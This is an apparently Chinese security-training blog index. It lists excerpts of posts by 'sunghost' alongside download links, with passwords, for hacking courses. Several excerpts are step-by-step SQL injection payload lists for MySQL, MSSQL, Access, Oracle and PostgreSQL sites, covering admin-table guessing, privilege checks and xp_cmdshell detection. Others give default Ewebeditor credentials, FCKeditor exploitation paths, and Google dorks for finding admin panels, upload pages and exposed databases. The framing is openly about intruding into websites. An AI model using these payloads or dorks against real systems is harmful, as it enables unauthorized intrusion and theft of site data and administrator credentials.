• 置顶文章
  • 最新文章
  • 热门文章
  • 随机文章

2016最新网络安全黑客培训教程统一大放送【视频+工具+源码+课件+学习资料】 热门文章

时间:2016-1-22   作者:sunghost   分类: 网络安全培训   浏览:6643   编辑   评论:38
时间:2016-1-22   分类: 网络安全培训    浏览:6643  
《黑客攻防秘技实战解析(第2版)》.(书籍加视频课程)
http://pan.baidu.com/s/1jGPxQ0u
1937网络集团军渗透环境搭建教程【上科互联】
链接: http://pan.baidu.com/s/1gdKKpF1 密码: w87u
3389系列教程19课【上科互联网络培训商学院】
链接: http://pan.baidu.com/s/1qWYFiZ6 密码: 3qbf
backtrackBT基础讲解视频【上科互联网络培训商学院】
链接: http://pan.baidu.com/s/1i4rkmhv 密码: c6ne
Backtrack教程10课【上科互联网络培训商学院搜集整理发布】
链接: http://pan.baidu.com/s/1eQT9LUM 密码: mgbt
E网情深VIP脚本漏洞提权班-15课全【上科互联网络培训商学院整理发布】
链接: http://pan.baidu.com/s/1i41ZCiD 密码: 6nqg
IT9学院-最新高级QQ攻防系列语音教程-49课全【上科互联网络培训商学院搜集整理发布】
链接: http://pan.baidu.com/s/1pKnAml9 密码: 39zc

阅读全文>>

㊙️2017网站安全培训【超级盒子】包含【网站入侵/渗透/代码审计/友情检测/批量拿shell/鬼手黒帽】 热门文章

时间:2017-6-1   作者:sunghost   分类: 网络安全培训   浏览:2570   编辑   评论:11
时间:2017-6-1   分类: 网络安全培训    浏览:2570  

上科互联说安全.jpg


学习阶段:基础篇,原理探测篇,实战检测与防范,综合利用篇,Linux系统方向等。

基础篇

Web安全简介               本章主要介绍学习路线,常规渗透测试流程,以及发展方向。

深入Web请求流程        本章深入讲解HTTP协议,对HTTP进行抓包,分析,学习Web安全,HTTP协议为必备的底层知识
信息探测                     在进行安全测试之前,最重要的一步就是信息探测,在本章你将会掌握各种“踩点”技能。

漏洞扫描                     在本章你将会学到各种渗透测试工具的精点用法,如:Nmap、BurpSuite、AWVS、Metasploit等。


原理探测篇 
SQL注入基础            SQL注入的原理,如MySQL注入,Oracle注入,MSSQL注入等数据库注入。
SQL注入进阶            突破防火墙进行注入,比如编码绕过技术,以及SQLMap、Pangolin、Havij、Jsql等工具的使用。
XSS原理解析            XSS技术原理,DOM,反射,储存XSS的表现形式等。
XSS进阶               深入挖掘XSS漏洞,并掌握一些常见的XSS Framework,蠕虫编写等技术。
CSRF                     苏醒的巨人,CSRF攻击技术
文件上传漏洞           掌握常见的解析漏洞,上传漏洞原理,并可以突破某些上传限制
逻辑漏洞挖掘           常见逻辑漏洞挖掘思路,方法,及流程讲解。
包含漏洞                掌握文件包含的高级玩法,不仅仅限于PHP Include
代码执行漏洞             深入讲解代码执行漏洞挖掘,利用方式。
其他漏洞                   XML注入、JSON注入、Web Server远程部署漏洞等漏洞。

综合利用篇
暴力破解               意外惊喜的暴力破解技术,在这里你将学到Hydra、Medusa等工具的高级用法。
旁注                     旁注是很有用的,在本章你将看到旁注的本质。
提权                     哦?还在看网上的那些老套的提权方法吗?OUT了!!!
内网渗透              内网渗透方式,ARP劫持,数据嗅探等技术。
社会工程学           信息收集、共同、伪造、等案例讲解。
APT攻击              主流的APT攻击案例讲解,APT攻击,乃是技术的综和应用。


Linux系统方向 
零基础的Linux世界           讲解Linux的安全维护
安全工具剖析                  剖析不一样的工具,针对Metasploit、SQLmap、Ettercap等安全工具进行深度剖析。
编写工具                        编写安全工具,你还在用别人的工具吗?不如自己尝试编写一个吧~
维持访问                        深度剖析维持访问,不得不说的维持访问,揭秘神秘猥琐手法。
计算机取证                    做专业的渗透测试,涉及多个取证方法、方面,让您全面了解计算机取证的世界。
Linux渗透                      Linux渗透技术,你还在苦于BT5、KALI不会用吗?你还在嫌弃网上的教程太简单吗?来吧!给你不一样的世界!

课程预览


阅读全文>>

渗透测试与挑战 热门文章

时间:2016-10-22   作者:sunghost   分类: 网络安全培训   浏览:1334   编辑   评论:2
时间:2016-10-22   分类: 网络安全培训    浏览:1334  
传统渗透测试常见问题
传统渗透测试主要关注于系统本身存在的常见问题,常见系统弱口令、SQL注入、跨站、struts2框架命令执行、上传漏洞和远程部署造成的getshell等问题。

阅读全文>>

Web渗透测试流程大揭秘 热门文章

时间:2016-9-2   作者:sunghost   分类: 网络安全培训   浏览:1531   编辑   评论:13
时间:2016-9-2   分类: 网络安全培训    浏览:1531  

渗透测试流程大揭秘.jpg

明确目标
确定范围,确定规则,确定需求
信息收集
基础信息,系统信息,应用信息,版本信息,服务信息,人员信息,防护信息。

漏洞探测

阅读全文>>

Ewebeditor编辑器漏洞利用总结[史上最全] 热门文章

时间:2016-9-1   作者:sunghost   分类: 网络安全培训   浏览:7692   编辑   评论:0
时间:2016-9-1   分类: 网络安全培训    浏览:7692  
1、关键文件的名称和路径
Admin_Login.asp 登录页面
Admin_Default.asp 管理首页
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb 默认数据库路径
默认用户名admin,密码admin,admin888
一般用这个的默认后台的URL都是默认的:
www.sunghost.cn/admin/ewebeditor/login_admin.asp

阅读全文>>

Fckeditor编辑器漏洞利用全面整理 热门文章

时间:2016-8-31   作者:sunghost   分类: 网络安全培训   浏览:3591   编辑   评论:7
时间:2016-8-31   分类: 网络安全培训    浏览:3591  
分享一些关于Fckeditor漏洞利用总结

1.查看Fckeditor编辑器基本信息

查看Fckeditor编辑器版本
FCKeditor/_whatsnew.html

FCKeditor编辑器页
FCKeditor/_samples/default.html 

阅读全文>>

2016年sqlmap使用教程【史上最全】 热门文章

时间:2016-8-29   作者:sunghost   分类: 网络安全培训   浏览:1242   编辑   评论:0
时间:2016-8-29   分类: 网络安全培训    浏览:1242  
sqlmap简介

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。

sqlmap支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。

阅读全文>>

web网站SQL注入方式总结 热门文章

时间:2016-8-28   作者:sunghost   分类: 网络安全培训   浏览:929   编辑   评论:10
时间:2016-8-28   分类: 网络安全培训    浏览:929  
access数据库注入
1.手工注入原理
联合查询爆用户名密码
2.ascii逐字猜解
3.偏移注入
*代替列名往前逐个替换
带入公式
表单变量测试列明
4.跨库查询
0day的挖掘

sqlserver注入

阅读全文>>

Postgre数据库注入利用 热门文章

时间:2016-8-27   作者:sunghost   分类: 网络安全培训   浏览:947   编辑   评论:1
时间:2016-8-27   分类: 网络安全培训    浏览:947  
Postgre数据库注入步骤

1.判断注入
’     报错
and 1=1 返回正常
and 1=2 返回错误
2.获取基本信息
and 1=cast(version() as int)  获取数据库版本信息系统信息
and 1=cast(user||123 as int)  获取当前用户名称  postgres用户相当于root用户权限
3.创建表

阅读全文>>

JSP+Oracle数据库注入 热门文章

时间:2016-8-27   作者:sunghost   分类: 网络安全培训   浏览:1418   编辑   评论:0
时间:2016-8-27   分类: 网络安全培训    浏览:1418  

 Oracle数据库注入步骤


1.首先我们判断一下有没有注入点,网址后加and 1=1返回正常;
2.加and 1=2返回错误,说明存在注入漏洞。
3.判断一下数据库中的表,网址后加上:and (select count(*) from admin) <>0返回正常,说明存在admin表。如果返回错误,可将admin改为username、manager等常用表名继续猜解。
4.判断下该网站下有几个管理员,如果有多个的话,成功入侵的几率就会加大and (select count(*) from admin)=1,返回正常说明只有一个管理员。
5.已知表的前提下,判断表中字段结构,and (select count(name) from admin)>=0返回正常,说明存在name字段。 and (select count(pass) from admin)>=0返回错误,说明不存在pass字段。

阅读全文>>

杂谈杂感【上科】 热门文章

时间:2016-7-9   作者:sunghost   分类: 网络安全培训   浏览:799   编辑   评论:1
时间:2016-7-9   分类: 网络安全培训    浏览:799  
黑客技术学的再好, 
却无法入侵你的心 
服务器入侵的再多 
对你只有GUEST 
是我的DDOS造成了你的拒绝服务? 
还是我的byshell再次被你查杀? 
你总有防火墙 
我始终停不掉 
想提权 

阅读全文>>

早期网站入侵渗透教程【上科互联搜集】 热门文章

时间:2016-2-18   作者:sunghost   分类: 网络安全培训   浏览:2070   编辑   评论:25
时间:2016-2-18   分类: 网络安全培训    浏览:2070  

网站入侵渗透免费教程.jpg

早期网站入侵渗透教程【上科互联搜集】下载地址:

阅读全文>>

PHP网站MySQL手工注入教程 热门文章

时间:2016-2-17   作者:sunghost   分类: 网络安全培训   浏览:2652   编辑   评论:10
时间:2016-2-17   分类: 网络安全培训    浏览:2652  
Mysql注入
1、判断注入点:
and 1=1
and 1=2
or 1=1
2、判断字段长度
order by 11
3、报错
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from information_schema.tables
4、报基本信息
database()//数据库名

阅读全文>>

Mssql手工注入教程 热门文章

时间:2016-2-16   作者:sunghost   分类: 网络安全培训   浏览:2150   编辑   评论:13
时间:2016-2-16   分类: 网络安全培训    浏览:2150  
mssql端口1433
1、判断是否有注入
and 1=1
and 1=2
2、初步判断是否是mssql
and user>0
and exists (select * from sysobjects) //判断是否是MSSQL
3、判断数据库系统
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
and 1=(select @@version) 报版本信息
and 1=(select @@VERSION) //MSSQL版本
and 1=(select db_name()) 报数据库名
and 1=(select @@servername) //本地服务名
4、猜解表名
and (select count(*) from [表名])>0
and exists(select * from [表名]) //猜解表名
5、猜解字段名
and (select count([字段名]) from [表名])>0
6、测试权限结构
and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- //判断是否是系统管理员
and 1=(select IS_SRVROLEMEMBER('db_owner'));-- //判断是否是库权限
and 1=(select IS_SRVROLEMEMBER('pulic'));-- //判断是否是public权限
and 1=(Select IS_MEMBER('db_owner'));-- //判断是否是库权限
and 1= (Select HAS_DBACCESS('master'));-- //判断是否有库读取权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
7、获取用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4) 获取第一个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名') //获取第二个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名' and name<>'数据库名') //获取第三个用户数据库
8、获取表名
and 1=(select top 1 name from sysobjects where xtype='u')//获取第一张表
and 1=(select top 1 name from sysobjects where xtype='U' and name <> '[表名]')//获取第二张表
9、获取列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user'))//获取user表的列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user')) and name <> 'uname' //获取user表的列名
10、获取表数据
and 1=(select top 1 [列名] from [表名])

阅读全文>>

ASP网站access手工注入流程及代码 热门文章

时间:2016-2-16   作者:sunghost   分类: 网络安全培训   浏览:4210   编辑   评论:14
时间:2016-2-16   分类: 网络安全培训    浏览:4210  
一、判断注入点
1.’
2.and 1=1
3.and 1=2
4.or 1=1 
5.or 1=2
6.and 1=23

二、判断使用的数据库类型
判断一下当前Web用的是什么数据库,这可以从Access和Mssql 的区别入手。Access和Mssql都有自己的系统表,比如存放数据库中所有对象的表,Access是在系统表[msysobjects]中,但在Web环境下读取该表会提示“没有权限”,Mssql是在表[sysobjects]中,在Web环境下则可正常读取。
and (select count(*) from msysobjects)>0 access
and exists (select * from msysobjects)>0 access
and (select count(*) from sysobjects)>0 sqlserver
and exists(select * from sysobjects)>0 sqlserver


三、判断数据库中的表
and exists (select * from admin)

阅读全文>>

网站渗透入侵常见谷歌黑客语法总结【sunghost】 热门文章

时间:2016-2-4   作者:sunghost   分类: 网络安全培训   浏览:11572   编辑   评论:6
时间:2016-2-4   分类: 网络安全培训    浏览:11572  

黑客常用的语法


admin site:edu.cn
site:sunghsot.cn intext:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录
site:sunghsot.cn intitle:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录
inurl:login/admin/manage/admin_login/login_admin/system/boos/master/main/cms/wp-admin/sys|managetem|password|username
site:www.sunghost.cn inurl:file
site:www.sunghost.cn inurl:load
site:www.sunghost.cn inurl:php?id=
site:www.sunghost.cn inurl:asp?id=
site:www.sunghost.cn inurl:fck
site:www.sunghost.cn inurl:ewebeditor
inurl:ewebeditor|editor|uploadfile|eweb|edit
intext:to parent directory
intext:转到父目录/转到父路径
inurl:upload.asp
inurl:cms/data/templates/images/index/
intitle:powered by dedecms
index of/ppt
Filetype:mdb
site:www.sunghost.cn intext:to parent directory+intext.mdb
inurl:robots.txt
site:sunghost.cn filetype:mdb|ini|php|asp|jsp
其他相关指令:related,cache,info,define,link,allinanchor等。

阅读全文>>